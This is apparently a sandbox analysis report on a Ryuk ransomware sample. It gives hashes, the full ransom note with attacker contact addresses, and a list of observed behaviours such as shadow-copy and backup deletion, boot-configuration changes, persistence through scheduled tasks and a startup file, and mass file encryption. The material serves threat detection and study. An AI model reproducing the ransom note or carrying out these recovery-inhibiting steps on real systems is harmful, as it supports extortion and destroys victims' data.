ryuk | 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

Analysis

max time kernel
146s
max time network
49s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
10-11-2022 06:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
Size

885KB
MD5

a57e1e6fe1c98d2e75799a46e9eb5797
SHA1

7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512

5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d
SSDEEP

12288:zD7Z7cwy8U9JlpYqWYgeWYg955/155/0QebUlAAsDsKKAosRn6X:z57ctflKgQKUKRDsKKAjN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Cara@onionmail.org or Cara@cyberfear.com You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

Cara@onionmail.org

Cara@cyberfear.com

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1420 bcdedit.exe
988 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1728 wbadmin.exe
Disables Task Manager via registry modification
evasion

pid	process
1420	bcdedit.exe
988	bcdedit.exe

pid	process
1728	wbadmin.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2004 icacls.exe

pid	process
2004	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

description	ioc	process
File opened (read-only)	\??\V:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\Z:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\M:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\O:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\Q:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\R:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\S:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\G:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\H:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\J:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\A:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\U:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\W:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\X:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\Y:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\E:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\K:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\B:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\P:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\T:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\F:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\I:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\L:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened (read-only)	\??\N:	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Drops file in Program Files directory 64 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107192.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File created	C:\Program Files\Java\RyukReadMe.html	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Library\SOLVER\SOLVER.XLAM.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Vancouver.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SplashScreen.bmp.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSQRY32.CHM.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN075.XML.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Yellowknife.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00233_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Median.thmx.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\CST6.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\HeartsMCE.lnk.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OCT.CHM.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEML.ICO.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.[Cara@onionmail.org].RYK	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Drops file in Windows directory 2 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
File created	C:\Windows\hrmlog1	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

288 schtasks.exe
1776 schtasks.exe
592 schtasks.exe
1136 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1708 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1096 taskkill.exe
1968 taskkill.exe
Runs net.exe

pid	process
288	schtasks.exe
1776	schtasks.exe
592	schtasks.exe
1136	schtasks.exe

pid	process
1708	vssadmin.exe

pid	process
1096	taskkill.exe
1968	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

pid	process
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 1096 taskkill.exe
Token: SeDebugPrivilege 1968 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1468 wrote to memory of 1416	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1416	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1416	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1416 wrote to memory of 1776	1416	cmd.exe	schtasks.exe
PID 1416 wrote to memory of 1776	1416	cmd.exe	schtasks.exe
PID 1416 wrote to memory of 1776	1416	cmd.exe	schtasks.exe
PID 1468 wrote to memory of 1376	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1376	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
